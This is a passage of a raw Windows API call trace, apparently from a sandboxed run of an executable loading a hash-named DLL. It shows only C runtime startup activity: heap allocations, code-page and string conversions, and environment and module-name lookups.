/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_info" [0239.676] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_info", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x4a9770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0239.676] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0239.680] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0239.680] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0239.681] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0239.681] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0239.681] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0239.682] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0239.682] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0239.682] GetProcessHeap () returned 0x4a0000 [0239.683] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0239.683] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0239.683] GetLastError () returned 0x0 [0239.683] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0239.683] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0239.683] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3c8) returned 0x4b5b10 [0239.908] SetLastError (dwErrCode=0x0) [0239.908] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1200) returned 0x4b5ee0 [0239.911] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0239.911] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0239.911] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0239.911] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0239.911] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_info" [0239.911] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_info" [0239.911] GetACP () returned 0x4e4 [0239.911] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x228) returned 0x4aaca0 [0239.912] IsValidCodePage (CodePage=0x4e4) returned 1 [0239.912] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0239.912] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0239.912] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.912] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0239.912] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0239.912] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.912] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0239.912] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0239.913] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0239.913] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0239.913] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0239.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0239.913] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.913] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0239.913] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0239.913] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0239.913] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0239.913] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0239.913] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1000) returned 0x4b70f0 [0239.914] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0239.914] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0239.914] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0239.915] AreFileApisANSI () returned 1 [0239.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0239.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xcb) returned 0x4a4860 [0239.915] GetEnvironmentStringsW () returned 0x4b8100* [0239.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4e6) returned 0x4b8ae0 [0239.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x4b8ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0239.915] FreeEnvironmentStringsW (penv=0x4b8100) returned 1 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x118) returned 0x4aa230 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1f) returned 0x4ab980 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2e) returned 0x4a98f0 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x31) returned 0x4a4fa0 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3c) returned 0x4b0950 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x31) returned 0x4a4fe0 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x14) returned 0x4a9c20 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x24) returned 0x4ab470 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xd) returned 0x4a3fb0 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1d) returned 0x4ab4a0 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x31) returned 0x4a5020 [0239.915] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x15) returned 0x4a5060 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x17) returned 0x4a4090 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xe) returned 0x4a25f0 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x69) returned 0x4a3eb0 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3e) returned 0x4b09f0 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1d) returned 0x4ab260 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x48) returned 0x4b0770 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x12) returned 0x4a3f30 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x18) returned 0x4a3f50 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1b) returned 0x4ab290 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1e) returned 0x4ab2c0 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x29) returned 0x4aba20 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1e) returned 0x4ab5f0 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x6b) returned 0x4aba60 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x17) returned 0x4a3f70 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xf) returned 0x4abae0 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x16) returned 0x4a8d00 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2a) returned 0x4b8510 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x29) returned 0x4b85d0 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x12) returned 0x4a8d20 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x21) returned 0x4ab440 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x16) returned 0x4b9320 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x22) returned 0x4ab320 [0239.916] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x12) returned 0x4b93a0 [0239.916] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8ae0 | out: hHeap=0x4a0000) returned 1 [0239.917] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa3a7) returned 0x4b93e0 [0239.919] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x20) returned 0x4ab350 [0239.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa3a7) returned 0x4c3790 [0239.921] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0239.921] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfef7) returned 0x4cdb40 [0239.924] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x40) returned 0x4b0270 [0239.924] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfef7) returned 0x4dda40 [0239.926] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab350 | out: hHeap=0x4a0000) returned 1 [0239.926] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cdb40 | out: hHeap=0x4a0000) returned 1 [0239.927] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x450) returned 0x4b8910 [0239.927] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x450) returned 0x4ed940 [0239.927] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0239.927] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1ea7) returned 0x4edda0 [0239.927] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xf40) returned 0x4b93e0 [0239.928] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x7a0) returned 0x4ba330 [0239.928] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4edda0 | out: hHeap=0x4a0000) returned 1 [0239.928] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b93e0 | out: hHeap=0x4a0000) returned 1 [0239.928] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xbf0) returned 0x4b93e0 [0239.928] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ed940 | out: 